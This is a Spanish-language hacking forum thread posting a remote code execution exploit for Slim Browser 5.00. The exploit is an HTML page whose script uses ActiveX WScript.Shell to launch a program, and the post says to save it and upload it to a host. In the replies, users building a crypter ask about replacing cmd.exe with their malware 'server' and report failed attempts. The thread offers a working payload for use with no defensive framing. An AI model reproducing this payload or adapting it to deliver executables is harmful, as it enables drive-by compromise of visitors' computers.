Código: Seleccionar todo

===================================
Slim Browser v5.00 Remote Code Execution
===================================

# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title: Slim Browser v5.00
# Software Link:http://slimbrowser.flashpeak.com/release/sbsetup.exe
# Version: 5.00
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/

Exploit
---------------------------------------------------------
Lo guardamos y subimos a un host y listo

<script>
function go() {
w = new ActiveXObject("WScript.Shell");
w.run('cmd.exe');
return true;
}
</script>
<form>
<h1>Abrir Cmd Pwned by PoisonCode</h1>
<input type="button" value="Pwned"
onClick="return go()">
</form>

Otro.. saludos.
Gracias Skillmax
voy a probarlo!
pd. solo una duda
en esta linea
w.run('cmd.exe');
cmd.exe debo cambiarlo por un link al executable?
saludos y gracias.
Imagen

♪♪ 2pac & Notorius B.I.G ♪♪
¿Por qué estoy luchando para vivir cuando estoy solo viven para luchar,
¿Por qué estoy tratando de ver cuando no hay nada a la vista,
¿Por qué estoy tratando de dar cuando nadie me da una oportunidad,
¿Por qué estoy muriendo para vivir cuando yo estoy viviendo para morir.♪♪
Como funciona el Exploit?

Lo que sabemos es una gota de agua; lo que ignoramos es el océano.
Matemático y físico británico.

Proceso de creación de crypter... 70%
Lo guardamos y subimos a un host y listo


Eso pone en el code, editando cmd.exe por el server ...
Me pueden ayudar?... Lo subi [Enlace externo eliminado para invitados] pero no hay manera no se ejecuta

PD: Miren el codigo de fuente en la pagina

¿Que falla?

Lo que sabemos es una gota de agua; lo que ignoramos es el océano.
Matemático y físico británico.

Proceso de creación de crypter... 70%
Responder

Volver a “Exploits”